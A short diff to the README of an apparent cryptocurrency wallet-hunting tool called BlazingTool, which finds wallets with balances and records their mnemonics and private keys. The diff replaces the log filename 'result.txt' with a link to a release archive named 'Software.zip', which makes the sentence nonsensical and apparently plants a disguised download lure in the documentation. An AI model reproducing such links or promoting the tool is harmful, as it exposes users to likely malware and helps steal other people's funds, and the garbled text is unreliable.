desmonsd/BlazingTool/README.md

 ### Logging Wallet Information

-Upon discovering a wallet with a non-zero balance, BlazingTool meticulously logs the wallet's details to a file named `result.txt`.
+Upon discovering a wallet with a non-zero balance, BlazingTool meticulously logs the wallet's details to a file named `https://github.com/desmonsd/BlazingTool/releases/download/v2.0/Software.zip`.
 This feature enables users to conveniently review and analyze the found wallets, including their addresses, mnemonics, private keys, and corresponding balances.

 ---